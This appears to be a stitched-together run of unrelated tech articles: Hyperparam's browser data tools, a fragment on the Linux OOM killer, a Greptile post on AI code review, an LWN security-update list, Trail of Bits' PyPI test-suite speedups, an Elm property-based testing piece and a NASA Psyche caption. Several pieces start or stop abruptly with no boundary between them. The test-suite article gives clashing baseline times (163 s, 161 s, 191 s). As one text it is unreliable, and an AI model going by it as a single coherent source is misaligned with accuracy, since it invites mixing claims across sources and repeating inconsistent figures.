Hyperparam integrates ML models to help label, filter, and transform data at a scale that would be impractical to review manually. By combining a highly interactive UI with model assistance, we make it possible for the user to use data to express exactly what they want from the model.
Local-First and Private:
Hyperparam runs entirely client-side, with no server dependency. This design not only simplifies setup (no complex pipeline or cloud needed) but also addresses enterprise compliance and security concerns, since sensitive data need not leave the user's machine. Fully browser-contained tools can bypass major adoption hurdles.
Experts across data engineering and MLOps widely agree on the need for better data exploration and labeling tools to tackle today's bottlenecks. We believe that the way to do that is to make data-centric AI workflows that are faster, easier to deploy, and more scalable – enabling users to iteratively improve data quality, which in turn yields better models.
The Hyperparam OSS Universe
Hyperparam delivers on our vision through a suite of open-source tools that tackle different aspects of data curation. These tools are built in TypeScript/JavaScript for seamless browser and Node.js usage.
We care about performance, minimal dependencies, and standards compliance.
Hyparquet: In-Browser Parquet Data Access
Hyparquet
is a lightweight, pure-JS library for reading
Apache Parquet
files directly in the browser. Parquet is a popular columnar format for large datasets, and Hyparquet enables web applications to tap into that efficiency without any server.
Hyparquet allows data scientists to open large dataset files instantly in a browser UI for examination, without needing Python scripts, servers, or cloud databases. It's useful for quick dataset validation (e.g. checking a sample of new data for quality issues) and for powering web-based data analysis tools. Because it's pure JS, developers can integrate Hyparquet into any web app or Electron application that needs to read Parquet. It is the core engine behind Hyperparam's own dataset viewer, enabling what was previously thought impossible:
client-side
big data exploration.
Browser-Native & Dependency-Free:
Hyparquet has
zero external dependencies
and is designed to run in both modern browsers and Node.js. At ~9.7 KB gzipped, it's extremely lightweight. It implements the full Parquet specification, aiming to be the “world's most compliant Parquet parser” that can open more files (all encodings and types) than other libraries.
Efficient Streaming of Massive Data:
Built with performance in mind, Hyparquet only loads the portions of data needed for a given query or view. It leverages Parquet's built-in indexing to fetch just the required rows or columns on the fly. This “load just in time” approach makes it feasible to interactively explore multi-gigabyte or even billion-row datasets in a web app.
Complete Compression Support:
Parquet files often use compression (Snappy, Gzip, ZSTD, etc.). Hyparquet by default handles common cases (uncompressed, Snappy), and with a companion library Hyparquet-Compressors, it supports
all
Parquet compression codecs. This is achieved with WebAssembly-optimized decompressors – notably HySnappy, a WASM Snappy decoder that accelerates parsing with minimal footprint.
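As a concrete sketch, reading a slice of a remote Parquet file looks roughly like this (helper and option names follow the Hyparquet README; the URL and column names are illustrative, and signatures may differ between versions):
import { asyncBufferFromUrl, parquetReadObjects } from 'hyparquet'

// Wrap the remote file so only the needed byte ranges are fetched.
const file = await asyncBufferFromUrl({ url: 'https://example.com/data.parquet' })

// Read just two columns of the first 100 rows.
const rows = await parquetReadObjects({
  file,
  columns: ['id', 'text'],
  rowStart: 0,
  rowEnd: 100,
})
console.log(rows[0])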
Hyparquet-Writer: Export Parquet Files from JavaScript
To complement Hyparquet's reading capabilities,
Hyparquet-Writer
provides a way to write or export data to Parquet format in JavaScript. It is designed to be as lightweight and efficient as its reading counterpart.
After exploring or filtering a dataset with Hyperparam's tools, a user might want to save a subset or annotations. Hyparquet-Writer makes it possible to export those results
in-browser
as a Parquet file (or in Node.js without needing Python/Java libraries). This is valuable for creating shareable
“refined datasets”
or for moving data between systems while staying in Parquet (avoiding expensive CSV conversions).
Fast Parquet Writing in JS:
Hyparquet-Writer can take in JavaScript data (arrays of values per column) and output a binary Parquet file. It provides high efficiency and compact storage, so that even in-browser data manipulation results can be saved in a columnar format.
Extreme Data Compression:
Parquet can represent large datasets very efficiently. It is especially efficient at representing sparse annotation data, exactly what we need for annotating and curating datasets.
Tiny and easy to deploy:
Before Hyparquet-Writer, the only way to write Parquet files from the browser was via huge WASM bundles (DuckDB, DataFusion). Hyparquet-Writer is less than 100 KB of pure JavaScript, so it's trivial to include in modern frontend applications.
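A sketch of the API shape, assuming the parquetWriteBuffer entry point and columnData option from hyparquet-writer's README (exact names may vary by version):

import { parquetWriteBuffer } from 'hyparquet-writer'

// Column-oriented input: one array of values per column.
const arrayBuffer = parquetWriteBuffer({
  columnData: [
    { name: 'id', data: [1, 2, 3] },
    { name: 'label', data: ['ok', 'bad', 'ok'] },
  ],
})
// In a browser, the resulting ArrayBuffer can be offered as a download
// via new Blob([arrayBuffer]) and URL.createObjectURL.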
HighTable: Scalable React Data Table Component
HighTable is a React-based virtualized table component for viewing extremely large tables in the browser. It is the UI workhorse that displays data fetched by Hyparquet or other sources.
HighTable is crucial for visual data exploration. In Hyperparam's dataset viewer, HighTable renders the content of Parquet files, allowing you to scroll through data that far exceeds memory limitations. You can also embed HighTable in custom web apps where a large results table is needed (for example, viewing logs, telemetry, or any big tabular data) without losing interactivity. By handling only what's visible, it bridges the gap between big data backends and a smooth front-end experience.
HighTable provides:
Virtual Scrolling for Large Data:
Instead of rendering thousands or millions of rows (which would choke the browser), HighTable only renders the rows in the current viewport, dynamically loading more as you scroll. This ensures smooth performance even with datasets that have millions of entries.
Asynchronous Data Loading:
HighTable works with a flexible data model that can fetch data on-the-fly. The table requests rows for a given range (e.g., 100–200) through a provided function. This means the data could come from an in-memory array, an IndexedDB store, or a remote source via Hyparquet. HighTable is agnostic as long as it can retrieve slices. This design allows infinite scrolling through data of “any size”.
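To make that data model concrete, a minimal adapter might look like the following; the field names (header, numRows, rows) are illustrative rather than HighTable's exact interface, so check the component's documentation for the real shape:

// Hypothetical adapter: names are illustrative, not HighTable's exact API.
const data = {
  header: ['id', 'text'],
  numRows: 1_000_000,
  // Called with a visible row range (e.g. 100-200); resolves only that slice,
  // whether from memory, IndexedDB, or a remote Parquet file via Hyparquet.
  rows: ({ start, end }) => fetchSlice(start, end), // fetchSlice is hypothetical
}
// Rendered as: <HighTable data={data} />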
Rich Table Features:
Despite focusing on scale, HighTable offers convenient features expected in a spreadsheet-like interface: optional column sorting, adjustable column widths, and event hooks (e.g., double-click on a cell). It even displays per-cell loading placeholders to indicate when data is being fetched, maintaining a responsive feel.
Icebird: JavaScript Apache Iceberg Table Reader
Icebird extends Hyperparam's reach into data stored in Apache Iceberg format. Iceberg is a popular table format for data lakes (often used on Hadoop/S3 storage) that stores Parquet files under the hood. Importantly, Iceberg allows you to efficiently evolve large datasets (add/remove rows, add columns, etc.). Icebird is essentially a JavaScript Iceberg client that can read Iceberg table metadata and retrieve data files, built on top of Hyparquet.
If you are using Data Lake/Lakehouse architectures, Icebird makes it possible to inspect large Iceberg tables without a big data engine. A data engineer can point Hyperparam's viewer at an S3 path of an Iceberg table and quickly peek at a few rows or columns for validation. This is dramatically simpler than launching Spark or Trino for a small inspection task. Icebird brings our “no backend” philosophy to another major data format.
Iceberg Table Access:
Given a pointer to an Iceberg table (for example, a directory or catalog entry on cloud storage), Icebird can read the table's schema and metadata, then use Hyparquet to read the actual Parquet file fragments that make up the table. It supports Iceberg features like schema evolution (renamed columns) and position deletes, with a roadmap to cover more features as needed.
Time Travel Queries:
Icebird allows users to retrieve data from older snapshots of the dataset (a feature of Iceberg) by specifying a metadata version to read. This is useful for auditing changes in data over time or reproducing an experiment on a previous dataset state – all from a browser environment.
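A sketch of what both kinds of read might look like, assuming an icebergRead entry point with tableUrl and metadataFileName options (these names are assumptions and may differ by version):

import { icebergRead } from 'icebird'

const tableUrl = 's3://bucket/path/to/iceberg-table' // hypothetical location

// Read the first rows of the current snapshot.
const rows = await icebergRead({ tableUrl, rowStart: 0, rowEnd: 10 })

// Time travel: point at an older metadata file to read a previous snapshot.
const oldRows = await icebergRead({
  tableUrl,
  metadataFileName: 'v1.metadata.json',
  rowStart: 0,
  rowEnd: 10,
})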
Hyllama: Llama.cpp Model Metadata Parser
Hyllama is a slightly different tool in Hyperparam's suite – it's focused on model files rather than dataset files. Specifically, Hyllama is a JavaScript library to parse llama.cpp .gguf files (a format for LLaMA and related large language model weights) and extract their metadata.
Hyllama's primary use case is to allow users to inspect an LLM model's content (architecture parameters, vocab size, layer counts, etc.) and potentially even query its listed tokens or other metadata in the browser. For instance, you can drag-and-drop a .gguf model file onto a web page using Hyllama and quickly see what architecture and quantization it has, without running the model. You can use Hyllama to introspect model files easily or to verify that a model file matches a dataset schema's expectations.
Efficient Metadata Extraction:
LLM model files in GGUF format can be tens of gigabytes, which is impractical to load entirely in memory. Hyllama is designed to read just the metadata (and tensor indexes) from the file without loading full weights, by using partial reads (e.g., reading the first few MBs that contain the header and index).
No Dependencies & Web-Friendly:
Like Hyparquet, Hyllama is dependency-free and can run in both Node and browser environments. For browser use, it suggests employing HTTP range requests to fetch just the needed bytes of a model file.
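A sketch of Node.js usage, assuming the ggufMetadata entry point from Hyllama's README (metadata key names come from the GGUF format and vary by model):

import { readFileSync } from 'node:fs'
import { ggufMetadata } from 'hyllama'

// In practice you would read only the first few MB that hold the header;
// for brevity this sketch reads the whole file.
const buffer = readFileSync('model.gguf')
const { metadata, tensorInfos } = ggufMetadata(buffer.buffer)

console.log(metadata['general.architecture'], tensorInfos.length)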
Hyperparam CLI: Local Dataset Viewer
The Hyperparam CLI ties everything together into a user-facing application. It is a command-line tool that, when run (npx hyperparam), launches a local web application for dataset viewing. Essentially, it's a one-command way to spin up the Hyperparam browser UI on your own local data.
Scalable Local Dataset Viewer:
By running the CLI, users can point it to a file, folder, or URL containing data and open an interactive browser view. For example, npx hyperparam mydataset.parquet will open the Hyperparam web UI and display the contents of that Parquet file in a scrollable table. If a directory is given, it provides a file browser to pick a dataset. Under the hood, the CLI uses Node.js to serve the static app and utilizes the Hyparquet/Icebird libraries (via a built-in API) to fetch data from local disk or remote URLs, then displays it with HighTable in the browser.
How the Tools Work Together
Hyperparam's suite of open-source tools is the backbone of a cohesive ecosystem tailored specifically for machine learning data workflows, enabling interactive exploration and management directly in the browser. By integrating efficient in-browser data handling (Hyparquet and Icebird), scalable visualization (HighTable), intuitive data export capabilities (Hyparquet-Writer), and model metadata inspection (Hyllama), we hope to show that there is a better way to build data-centric ML tools. We are releasing this work as open source because we believe that everyone benefits from having a strong ecosystem of AI data tools.
If you find these free open source tools useful, please show it! We love GitHub Stars ⭐
The out-of-memory (OOM) killer has long been a scary and controversial part
of the Linux kernel. It is summoned from some dark place when the system
as a whole (or, more recently, any given control group) is running so low
on memory that further allocations are not possible; its job is to kill off
...
AI code review: Should the author be the reviewer?
Alternate title: I’m using AI to write code. Is it silly to use AI to review it?
I'm Daksh, a co-founder of Greptile. Our product uses AI to review pull requests to surface bugs and anti-patterns that humans might miss.
Here is an example of what that looks like.
Recently, I was curious to see if there exists a power law in the number of PRs opened by individual Greptile users. In other words - were some users opening orders of magnitude more PRs than others? A quick SQL query later, I discovered that there is a power law to this.
I also noticed something else very interesting:
At the far left of the long list of GitHub usernames was “devin-ai-integration[bot]”.
An AI bot was writing more pull requests than any individual human. [1]
Seeing as Devin uses the same LLMs under the hood as Greptile, it does raise an interesting question – should the author be the reviewer?
[1] Granted that this is somewhat of a technicality. Devin’s contributions across many orgs are being counted in aggregate here. It would be more accurate to treat “Devin @ Company A” and “Devin @ Company B” as separate entries in this chart.
Most software companies wouldn’t want the PR reviewer to be the same person as the PR author. A large part of why PR reviews happen is to ensure every new piece of code gets a fresh set of eyes. It seems silly to have Claude Sonnet generate a bunch of code, and then expect Claude Sonnet to find bugs in it.
There are a few counterpoints worth discussing:
Statelessness
If you’ve used LLM APIs, you’ll notice that they are stateless. Every inference call is a clean-slate request for intelligence. As a result, asking an LLM to review its own code is looking at it with a fresh set of eyes.
Scaffolding
Scaffolding refers generally to the specific workflows that a tool uses to wrap the LLM call to allow it to do the task at hand. For an AI code reviewer, it might be the set of steps it takes to review a diff: checking for bugs, formulating comments, and finally self-assessing comment severity, plus the context retrieval along the way to ensure it’s looking at the relevant docs and code files in the codebase. For Devin, it is likely just as complex and completely different. In other words, the reviewer is in fact materially different from the author. These are two distinct cars that just happen to have the same engine.
How different are two humans, really?
In a pre-AI world, the author and reviewer of a PR are two distinct people. However, they contain the same intelligence at their core, not unlike two AI tools. Not only do they share a functionally identical brain from a biological standpoint, they even have shared knowledge since they are both trained engineers and shared context since they are coworkers at the same company.
AI-Generated Code Needs Closer Reviewing
AI code isn’t slop, but it is a little sloppy
There is no doubt that AI has made programmers faster and more effective. That said, in my opinion, AI has reduced the average quality of the code that good engineers write. This is not strictly because the models produce worse code than good engineers. It’s because:
1. Prompting is an imperfect and lossy way to communicate requirements to AI.
2. Engineers underestimate the degree to which this is true, and don’t review AI-generated code as carefully as they would review their own.
The reason for #2 isn’t complacency: one can review code at the speed at which they can think and type, but not at the speed at which an LLM can generate. When you’re typing code, you review as you go; when you AI-generate the code, you don’t.
Interestingly, the inverse is true for mediocre engineers, for whom AI actually improves the quality of the code they produce. AI simply makes good and bad engineers converge on the same median as they rely on it more heavily.
Humans are bad at catching the types of bugs that AI introduces
AI-generated code generally contains more bugs. Moreover, these bugs are not the type humans would introduce. How often have you found that Cursor’s “Apply” function changed a line of code you didn’t expect it to change, and you didn’t notice until later? How many of those bugs were things you could see yourself introducing without AI?
Moreover, PR review is not a great way to catch bugs. Humans just aren’t that good at detecting them, so PR review tends to be more of a style/pattern enforcement exercise, and on occasion an architecture review.
Oddly, it turns out AI is actually much better than humans at finding bugs in code. During our tests, we found the newest Anthropic Sonnet model correctly identified 32 out of the 209 bugs in the “hard” category of our bug-finding benchmark. For reference, none of the highly skilled engineers at Greptile could identify more than 5-7. Note that 32/209 isn’t great either; it’s just better than the human developers.
Just In: Used Car Salesman Sincerely Feels You Need A Used Car
Disclaimer in case it wasn’t clear: we sell an AI code reviewer, so take what you will from this. This isn’t an exercise in intellectual dishonesty that exists to persuade you to buy; it’s the earnest attempt at intellectual honesty that led us to work on AI code review in the first place.
Security updates for Thursday
Linux Weekly News
lwn.net
2025-05-01 14:37:57
Security updates have been issued by Debian (expat, fig2dev, firefox-esr, golang-github-gorilla-csrf, jinja2, libxml2, nagvis, qemu, request-tracker4, request-tracker5, u-boot, and vips), Fedora (firefox, giflib, and thunderbird), Mageia (imagemagick), Red Hat (thunderbird), SUSE (amber-cli, libjxl,...
Trail of Bits has collaborated with PyPI for several years to add features and improve security defaults across the Python packaging ecosystem. Our previous posts have focused on features like digital attestations and Trusted Publishing, but today we’ll look at an equally critical aspect of holistic software security: test suite performance.
A robust testing suite is essential to the security and reliability of a complex
codebase. However, as test coverage grows, so does execution time, creating
friction in the development process and disincentivizing frequent and meaningful
(i.e., deep) testing. In this post, we’ll detail how we methodically optimized
the test suite for Warehouse (the back end that powers PyPI), reducing execution time from 163 seconds to 30 seconds while the test count grew from 3,900 to over 4,700.
Figure 1: Warehouse test execution time over a 12-month period (March 2024 to April 2025).
We achieved an 81% performance improvement through several steps:
Parallelizing test execution with pytest-xdist (67% relative reduction)
Using Python 3.12’s sys.monitoring for more efficient coverage instrumentation (53% relative reduction)
Optimizing test discovery with strategic testpaths configuration
Eliminating unnecessary imports that added startup overhead
These optimizations are directly applicable to many Python projects, particularly those with growing test suites that have become a bottleneck in development workflows. By implementing even a subset of these techniques, you can dramatically improve your own test performance at little cost.
All times reported in this blog post are from running the Warehouse test suite at the specified date, on an n2-highcpu-32 machine. While not intended as formal benchmarking results, these measurements provide clear evidence of the impact of our optimizations.
The beast: Warehouse’s testing suite
PyPI is a critical component of the Python ecosystem: it serves over one
billion distribution downloads per day, and developers worldwide depend on
its reliability and integrity for the software artifacts that they
integrate into their stacks.
This criticality makes comprehensive testing non-negotiable, and Warehouse
correspondingly demonstrates exemplary testing practices: 4,734 tests (as of
April 2025) provide 100% branch coverage across the combination of unit and
integration suites. These tests are implemented using the pytest framework and run on every pull request and merge as part of a robust CI/CD pipeline, which additionally enforces 100% coverage as an acceptance requirement. On our benchmark system, the current suite execution time is approximately 30 seconds.
This performance represents a dramatic improvement from March 2024, when the test suite:
Contained approximately 3,900 tests (17.5% fewer tests)
Required 161 seconds to execute (5.4× longer)
Created significant friction in the development workflow
Below, we’ll explore the systematic approach we took to achieve these
improvements, starting with the highest-impact changes and working through to
the finer optimizations that collectively transformed the testing experience for
PyPI contributors.
Parallelizing test execution for massive gains
The most significant performance improvement came from a foundational computing
principle: parallelization. Tests are frequently well-suited for parallel
execution because well-designed test cases are isolated and have no side effects
or globally observable behavior. Warehouse’s unit and integration
tests were already well-isolated, making parallelization an obvious first
target for our optimization efforts.
We implemented parallel test execution using pytest-xdist, a popular plugin that distributes tests across multiple CPU cores. The pytest-xdist configuration is straightforward: this single line change is enough!
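A sketch of that change (the exact file and syntax in Warehouse may differ; --numprocesses=auto is the pytest-xdist option named in the quick wins below):

# pytest configuration, e.g. pytest.ini or [tool.pytest.ini_options] in pyproject.toml
addopts = --numprocesses=auto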
Figure 2: Configuring pytest to run with pytest-xdist.
With this simple configuration, pytest automatically uses all available CPU cores. On our 32-core test machine, this immediately yielded dramatic improvements while also revealing several challenges that required careful solutions.
Challenge: database fixtures
Each test worker needed its own isolated database instance to prevent cross-test contamination.
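A sketch of the pattern (not Warehouse's exact code), using the worker_id fixture that pytest-xdist provides to each worker ("gw0", "gw1", and so on):

import pytest

@pytest.fixture(scope="session")
def database_url(worker_id):
    # Suffix the database name with the xdist worker id so each worker
    # migrates and queries its own database.
    return f"postgresql://localhost/tests_{worker_id}"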
This change made each worker use its own database instance, preventing any
cross-contamination between different workers.
Challenge: coverage reporting
Test parallelization broke our coverage reporting since each worker process collected coverage data independently. Fortunately, this issue was covered in the coverage documentation. We solved the issue by adding a sitecustomize.py file.
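The coverage.py documentation's recipe for measuring subprocesses is a sitecustomize.py along these lines (it only activates when COVERAGE_PROCESS_START points at a coverage configuration file):

# sitecustomize.py -- imported automatically at interpreter startup.
import coverage

# Start coverage in this (worker) process if COVERAGE_PROCESS_START is set.
coverage.process_startup()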
Figure 4: Starting coverage instrumentation when using multiple workers.
Challenge: test output readability
Parallel execution produced interleaved, difficult-to-read output. We integrated pytest-sugar to provide cleaner, more organized test results (PR #16245).
Results
These changes were merged in PR #16206 and produced remarkable results:
Test execution time: 191s before → 63s after (67% reduction)
This single optimization delivered most of our performance gains while requiring
relatively few code changes, demonstrating the importance of addressing
architectural bottlenecks before fine-tuning individual components.
Optimizing coverage with Python 3.12’s sys.monitoring
Our analysis identified code coverage instrumentation as another significant
performance bottleneck. Coverage measurement is essential for testing quality,
but traditional implementation methods add considerable overhead to test
execution.
PEP 669 introduced sys.monitoring, a lighter-weight way to monitor the execution. The coverage.py library began supporting this new API in version 7.4.0:
In Python 3.12 and above, you can try an experimental core based on the new sys.monitoring module by defining a COVERAGE_CORE=sysmon environment variable. This should be faster, though plugins and dynamic contexts are not yet supported with it. (source)
Changes in Warehouse
# In Makefile
- docker compose run --rm --env COVERAGE=$(COVERAGE) tests bin/tests --postgresql-host db $(T) $(TESTARGS)
+ docker compose run --rm --env COVERAGE=$(COVERAGE) --env COVERAGE_CORE=$(COVERAGE_CORE) tests bin/tests --postgresql-host db $(T) $(TESTARGS)
Figure 5: Changes to the Makefile to allow setting the COVERAGE_CORE variable.
Using this new coverage feature was straightforward, thanks to Ned Batchelder’s excellent documentation and hard work!
Change impact
This change was merged in PR #16621 and the results were also remarkable:
Test execution time: 58s before → 27s after (53% reduction)
This optimization highlights another advantage of Warehouse’s development process: by adopting new Python versions (in this case, 3.12) relatively quickly, Warehouse was able to leverage sys.monitoring and benefit directly from the performance improvements it lends to coverage.
Accelerating pytest’s test discovery phase
Understanding test collection overhead
In large projects, pytest’s test discovery process can become surprisingly expensive:
Pytest recursively scans directories for test files
It imports each file to discover test functions and classes
It collects test metadata and applies filtering
Only then can actual test execution begin
For PyPI’s 4,700+ tests, this discovery process alone consumed over 6 seconds—10% of our total test execution time after parallelization.
Strategic optimization with testpaths
Warehouse tests are all located in a single directory structure, making them ideal candidates for a powerful pytest configuration option: testpaths.
This simple one-line change instructs pytest to look for tests only in the specified directory, eliminating wasted effort scanning irrelevant paths:
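A sketch of the configuration, assuming the suite lives under a tests/ directory:

# pytest configuration
testpaths = tests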
$ docker compose run --rm tests pytest --postgresql-host db --collect-only
# Before optimization: 3,900+ tests collected in 7.84s
# After optimization: 3,900+ tests collected in 2.60s
Figure 7: Computing the test collection time.
This represents a 66% reduction in collection time.
Impact analysis
This change, merged in PR #16523, reduced the total test time from 50 seconds to 48 seconds—not bad for a single configuration line change.
While a 2-second improvement might seem modest compared to our parallelization
gains, it’s important to consider:
Cost-to-benefit ratio: this change required only a single line of configuration.
Proportional impact: collection represented 10% of our remaining test time.
Cumulative effect: every optimization compounds to create the overall improvement.
This optimization applies to many Python projects. For maximum benefit, examine your project structure and ensure testpaths points precisely to your test directories without including unnecessary paths.
Removing unnecessary import overhead
After implementing the previous optimizations, we turned to profiling import times using Python’s -X importtime option. We were interested in how much time is spent importing modules not used during the tests. Our analysis revealed that the test suite spent significant time importing ddtrace, a module used extensively in production but not during the tests.
# Before uninstalling ddtrace
> time pytest --help
real 0m4.975s
user 0m4.451s
sys 0m0.515s

# After uninstalling ddtrace
> time pytest --help
real 0m3.787s
user 0m3.435s
sys 0m0.346s
Figure 8: Time spent to load pytest with and without ddtrace.
Test execution time: 29s before → 28s after (3.4% reduction)
This simple change was merged in PR #17232, reducing our test execution time from 29 seconds to 28 seconds—a modest but meaningful 3.4% improvement. The key insight here is to identify dependencies that provide no value during testing but incur significant startup costs.
The database migration squashing experiment
As part of our systematic performance investigation, we analyzed the database
initialization phase to identify potential optimizations. Warehouse uses
Alembic
to manage database migrations, with over 400 migrations accumulated
since 2015. During test initialization, each parallel worker must execute these
migrations to establish a clean test database.
Quantifying migration overhead
To quantify this overhead, we timed the migration step in isolation.
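One quick way to get that number (our own sketch, not necessarily the exact command used):

# Time how long an empty database takes to reach the current schema.
$ time alembic upgrade head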
Figure 9: A quick and dirty way to measure migration overhead.
Migrations take about 1s per worker, so that’s something we could further improve.
Prototyping a solution
While Alembic doesn’t officially support migration squashing, we developed a proof of concept based on community feedback. Our approach:
Created a squashed migration representing the current schema state.
Implemented environment detection to choose between paths: tests would use the single squashed migration, while production would continue using the full migration history.
Our proof of concept further reduced test execution times by 13%.
Deciding not to merge
After careful review, the project maintainers decided against merging
this change. The added complexity of managing squashed migrations and a second
migration path outweighed the time benefits.
This exploration illustrates a crucial principle of performance engineering: not
all optimizations that improve metrics should be implemented. A holistic
evaluation must also consider long-term maintenance costs. Sometimes, accepting a
performance overhead is the right architectural decision for the long-term
health of the project.
Test performance as a security practice
Optimizing test performance is not merely a developer convenience—it’s part of a security mindset. Faster tests tighten feedback loops, encourage more frequent testing, and enable developers to catch issues before they reach production.
All the improvements described in this post were achieved without modifying test
logic or reducing coverage—a testament to how much performance can be gained
without security trade-offs.
Quick wins to accelerate your test suite
If you are looking to apply these techniques to your own test suites, here is some advice on how to prioritize your optimization efforts for maximum impact.
Parallelize your test suite: install pytest-xdist and add --numprocesses=auto to your pytest configuration.
Optimize coverage instrumentation: if you’re on Python 3.12+, set export COVERAGE_CORE=sysmon to use the lighter-weight monitoring API in coverage.py 7.4.0 and newer.
Speed up test discovery: use testpaths in your pytest configuration to focus test collection on only relevant directories and reduce collection times.
Eliminate unnecessary imports: use python -X importtime to identify slow-loading modules and remove them where possible.
With a couple of highly targeted changes, you can achieve significant
improvements in your own test suites while maintaining their effectiveness as a
quality assurance tool.
Security loves speed
Fast tests enable developers to do the right thing. When your tests run in
seconds rather than minutes, security practices like
testing every change
and
running the entire suite before merging
become realistic expectations rather than
aspirational guidelines. Your test suite is a frontline defense, but only if it
actually runs. Make it fast enough that no one thinks twice about running it.
Acknowledgments
Warehouse is a community project, and we weren’t the only ones improving its test suite. For instance, PR #16295 and PR #16384 by @twm also improved performance by turning off file synchronization for postgres and caching DNS requests.
This work would not have been possible without the broader community of open source developers who maintain PyPI and the libraries that power it. In particular, we would like to thank @miketheman for motivating and reviewing this work, as well as for his own relentless improvements to Warehouse’s developer experience. We also extend our sincere thanks to Alpha-Omega for funding this important work, as well as for funding @miketheman’s own role as PyPI’s Security and Safety Engineer.
Our optimizations also stand on the shoulders of projects like pytest, pytest-xdist, and coverage.py, whose maintainers have invested countless hours in building robust, performant foundations.
For example, one weakness of our test above is that we chose to pop and push with equal probability. As a result, our queue is very short on average. We never exercise large queues!
He asked:
How does one detect which situations are or aren’t covered in practice by property-based tests? Like, when would you say “the distribution we have doesn’t cover this case”?
How do you indeed! You could use Fuzz.examples to visually check whether the generated values make sense to you:
-- inside Elm REPL
> import Fuzz
> Fuzz.examples 10 (Fuzz.intRange 0 10)
[4,6,3,6,9,9,9,3,3,6]
: List Int
but did you just get unlucky and saw no 0 and 10, or do they never get generated?
To build the motivation a little bit, let’s try and see the issue from the TigerBeetle blogpost. Assume we have a Queue implementation (the details don’t matter):
type Queue a
empty : Queue a
push : a -> Queue a -> Queue a
pop : Queue a -> (Maybe a, Queue a)
length : Queue a -> Int
Now let’s try to test it!
type QueueOp
= Push Int
| Pop
queueOpFuzzer : Fuzzer QueueOp
queueOpFuzzer =
Fuzz.oneOf
[ Fuzz.map Push Fuzz.int
, Fuzz.constant Pop
]
applyOp : QueueOp -> Queue Int -> Queue Int
applyOp op queue =
case op of
Push n ->
Queue.push n queue
Pop ->
Queue.pop queue
|> Tuple.second
queueFuzzer : Fuzzer (Queue Int)
queueFuzzer =
Fuzz.list queueOpFuzzer
-- would generate [ Push 10, Pop, Pop, Push 5 ] etc.
|> Fuzz.map (\ops -> List.foldl applyOp Queue.empty ops)
-- instead generates a queue with the ops applied
The queueFuzzer makes a sort of random walk through the ops to arrive at a random Queue.
Now if we were worried we’re not testing very interesting cases, we could debug-print their lengths and look at the logs real hard and make a gut decision about whether it’s fine, but doesn’t that feel a bit icky?
With all of the secrets out, let me now properly introduce you to Test.Distribution. It’s a relatively new addition to the Elm test library API (added in v2.0.0; it has been 3 years already, wow) which lets you measure or alternatively enforce how often each interesting case needs to happen.
Before I get to the actual Test.Distribution stuff, let me also say that in addition to the Fuzz.examples mentioned earlier, there’s also Fuzz.labelExamples, which you can use in the REPL to see an example of each labelled case (if it occurs):
Fuzz.labelExamples 100
[ ( "Lower boundary (1)", \n -> n == 1 )
, ( "Upper boundary (20)", \n -> n == 20 )
, ( "In the middle (2..19)", \n -> n > 1 && n < 20 )
, ( "Outside boundaries??", \n -> n < 1 || n > 20 )
]
(Fuzz.intRange 1 20)
-->
[ ( [ "Lower boundary (1)" ], Just 1 )
, ( [ "Upper boundary (20)" ], Just 20 )
, ( [ "In the middle (2..19)" ], Just 3 )
, ( [ "Outside boundaries??" ], Nothing )
]
As you can see, each case consists of a label and a predicate. These can overlap:
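For example, here is a fizzbuzz-style labelling of Fuzz.intRange 1 20, as a sketch using Test.reportDistribution (which prints the observed distribution table without enforcing anything):

Test.fuzzWith
    { runs = 100
    , distribution =
        Test.reportDistribution
            [ ( "even", \n -> modBy 2 n == 0 )
            , ( "odd", \n -> modBy 2 n == 1 )
            , ( "fizz", \n -> modBy 3 n == 0 )
            , ( "buzz", \n -> modBy 5 n == 0 )
            ]
    }
    (Fuzz.intRange 1 20)
    "fizzbuzz distribution"
    (\n -> Expect.pass)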
As you would expect, of the 20 numbers in the range 1..20:
there are 10 even and 10 odd ones, so the labels even and odd should each happen with probability 10/20 (50% of the time), though the real counts will vary slightly due to randomness;
there are 6 multiples of 3, so the label fizz should happen with probability 6/20 (30% of the time);
there are 4 multiples of 5, so the label buzz should happen with probability 4/20 (20% of the time).
Note the combinations are disjoint in a sense: the hits for “fizz, buzz, odd” aren’t counted in “fizz, odd”, and that’s why “fizz, odd” only shows around 10% probability instead of the expected 15%: “fizz, buzz, odd” has stolen the missing 5% from it as a more specific combination of labels.
Distributions are more useful when you enforce them instead of just reporting them. Use Test.expectDistribution:
Test.fuzzWith
{ runs = 100
, distribution =
Test.expectDistribution
[ ( Test.Distribution.atLeast 4, "low", \n -> n == 1 )
, ( Test.Distribution.atLeast 4, "high", \n -> n == 20 )
, ( Test.Distribution.atLeast 80, "in between", \n -> n > 1 && n < 20 )
, ( Test.Distribution.zero, "outside", \n -> n < 1 || n > 20 )
, ( Test.Distribution.moreThanZero, "one", \n -> n == 1 )
]
}
(Fuzz.intRange 1 20)
"Int range boundaries - mandatory"
(\n -> Expect.pass)
In the test above, we expect the uniform fuzzer of numbers 1..20 to produce the number 1 at least 4% of the time. If the real probability was 2%, the test would fail on grounds of distribution, even though the actual test function always passes.
In reality the number 1 will happen 5% of the time (1/20; Fuzz.intRange is uniform), but it’s not the best idea to enforce the exact probability, because the library tries to run the fuzzer until it’s statistically sure (1 false positive in 10^9 runs) that the distribution is reached.
This means that instead of the default 100 fuzzed values it might end up generating thousands or millions of values to make sure. So being a bit off the real probability helps keep the test suite fast.
Test.expectDistribution won’t show the table and will generally be silent, but it will complain loudly and fail the test if the wanted distribution isn’t reached (even if the actual test function passes), like in the following example where I’ve bumped the expected probability of generating the number 1 to 10%:
✗ Int range boundaries - mandatory
Distribution of label "low" was insufficient:
expected: 10.000%
got: 5.405%.
(Generated 2146 values.)
You can see it generated 2146 values to be sure of the result, instead of the specified 100.
That about covers it! This post mostly wants to show that this can be done in the Elm PBT testing world; if you want to dive deeper, I heartily recommend the mentioned YouTube talk by John Hughes.
TL;DR: with Test.Distribution you can measure and enforce how often your tests generate categories of values of your choosing.
NASA's Psyche spacecraft hits a speed bump on the way to a metal asteroid
An illustration depicts a NASA spacecraft approaching the metal-rich asteroid Psyche. Though there are no plans to mine Psyche, such asteroids are being eyed for their valuable resources.
Credit: NASA/JPL-Caltech/ASU
Each electric thruster on Psyche generates just 250 milli-newtons of thrust, roughly equivalent to the weight of three quarters. But they can operate for months at a time, and over the course of a multi-year cruise, these thrusters provide a more efficient means of propulsion than conventional rockets.
